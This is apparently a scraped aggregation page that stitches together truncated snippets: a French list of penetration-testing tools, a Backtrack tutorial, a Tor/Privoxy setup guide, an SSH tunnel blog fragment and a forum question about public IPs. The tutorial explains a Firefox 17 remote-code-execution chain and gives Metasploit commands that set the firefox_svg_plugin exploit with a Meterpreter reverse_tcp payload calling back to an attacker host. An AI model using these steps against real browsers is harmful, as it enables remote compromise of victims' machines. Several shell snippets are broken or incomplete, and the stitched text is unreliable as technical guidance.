10 outils de hacking pour les experts

Exploits, monitoring de réseau Wi-Fi, cassage de mot de passe, injection de code, sniffing, audit de vulnérabilité, 10 outils incontournables pour l'audit et les tests d'intrusion. Metasploit, John The Ripper, Nmap, Nessus, WebScarab, ces logiciels, souvent en Open Source, constituent l'arsenal des experts en sécurité et des RSSI pour la conduite de tests d'intrusion sur les réseaux et les applications Web. Notre sélection : Metasploit Metasploit est une plate-forme Open Source de tests d'intrusion embarquant des fonctionnalités d'automatisation d'exploitation de failles et de création d'exploits. John The Ripper Conçu par Alexander Peslyak alias Solar, John The Ripper est un logiciel Open Source est un spécialiste de la casse de mots de passe. Aircrack-ng Distribué sous licence GNU GPL, Aircrack-ng englobe plusieurs outils d'audit et de monitoring de réseaux sans fil. Wireshark Nmap Nmap est également un logiciel Open Source. Nessus Cain & Abel Paros Proxy WebScarab Burp Suite
Backtrack 5 Tutorials | Hacking Articles
This exploit gains remote code execution on Firefox 17.0.1 and all previous versions provided the user has installed Flash. No memory corruption is used. First, a Flash object is cloned into the anonymous content of the SVG “use” element in the <body> (CVE-2013-0758). From there, the Flash object can navigate a child frame to a URL in the scheme. Then a separate exploit (CVE-2013-0757) is used to bypass the security wrapper around the child frame’s window reference and inject code into the context. Once we have injection into the chrome execution context, we can write the payload to disk, chmod it (if posix), and then execute. Exploit Targets Firefox 17.0.1 Windows PC Linux PC Requirement Attacker: Backtrack 5 Victim PC: Windows 7 Open backtrack terminal type msfconsole Now type use exploit/multi/browser/firefox_svg_plugin msf exploit (firefox_svg_plugin)>set payload windows/meterpreter/reverse_tcp msf exploit (firefox_svg_plugin)>set lhost 192.168.1.167 (IP of Local Host)
Installer un serveur mandataire (proxy) anonymisant TOR sur Debian — Biapy Help Desk
TOR (aussi connu comme The Onion Router) est un mécanisme de serveurs proxy enchaînés et chiffrés masquant votre identité aux sites que vous visitez au prix d'une vitesse de surf nettement moindre. Privoxy ajoute une couche de protection à TOR. Il bloque les publicités, le referrer, et assure la compatibilité avec le protocole SOCKS. Ce guide est testé sur: Debian 5.0 LennyDebian 6.0 SqueezeDebian 7.0 Wheezy Installation Pour installer rapidement le serveur mandataire TOR, utilisez: Le serveur est disponible sur le port 8118. Installation pas à pas Installez les prérequis d'installation: command apt-get install lsb-release gnupg Optimisez les paramètres système pour Tor: if [ -z "$(command grep 'Tor system setup' '/etc/sysctl.conf')" ]; then command echo "# Tor system setup.fs.file-max=100000" >> '/etc/sysctl.conf' command sysctl -pfi Récupérez le nom de la distribution: DEBIAN_VERSION=$(command lsb_release -cs) Ajoutez les dépôts du logiciel à votre configuration apt: command apt-get update
Faire passer son trafic dans un tunnel SSH
Ben non, encore ce bon vieux SSH mais utilisé d'une "nouvelle" manière. Le besoin Le besoin d'origine était de pouvoir, de mon portable et de n'importe où, envoyer un mail de manière sécurisée. Mais récemment, j'ai été amené à étendre cette logique à d'autres services. Pour ceux qui se demanderait quel intérêt peut on avoir de s'enquiquiner de la sorte, une petite liste non exhaustive des raisons : Déjà pour accéder à des services sur une machine distante que l'on ne souhaite pas ouvrir sur le net généralement par soucis de sécurité ET de simplicité. Autant de raisons qui font du tunnel chiffré un précieux outil. SOCKS est un protocole qui permet (en simplifié) à une application cliente d'accéder aux ressources réseau d'une machine distante. Or il se trouve que dans sa grande générosité, SSH offre le protocole SOCKS V5. Pour tester cela en 10 secondes, rien du plus simple. Voilà c'est gagné. On s'arrête un peu sur les arguments utilisés. command! Script de contrôle du tunnel #! #!
Comment connaitre mon ip public en ligne de commande. (Page 1) / [Anciennes versions] Support général
Bonjour, souhaitant apprendre à installer un serveur à domicile, je voudrais savoir comment connaitre son ip public en ligne de commande. J'ai tapé ifconfig, mais ça me donne rien : [root@localhost guest]# ifconfig eth0 Link encap:Ethernet HWaddr 08:00:27:95:3A:6F inet addr:10.0.2.15 Bcast:10.0.2.255 Mask:255.255.255.0 inet6 addr: fe80::a00:27ff:fe95:3a6f/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:20626 errors:0 dropped:0 overruns:0 frame:0 TX packets:6976 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:26966953 (25.7 MiB) TX bytes:383026 (374.0 KiB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:8 errors:0 dropped:0 overruns:0 frame:0 TX packets:8 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:400 (400.0 b) TX bytes:400 (400.0 b) [root@localhost guest]# Une idée ? Merci d'avance, cordialement
Related:
Related: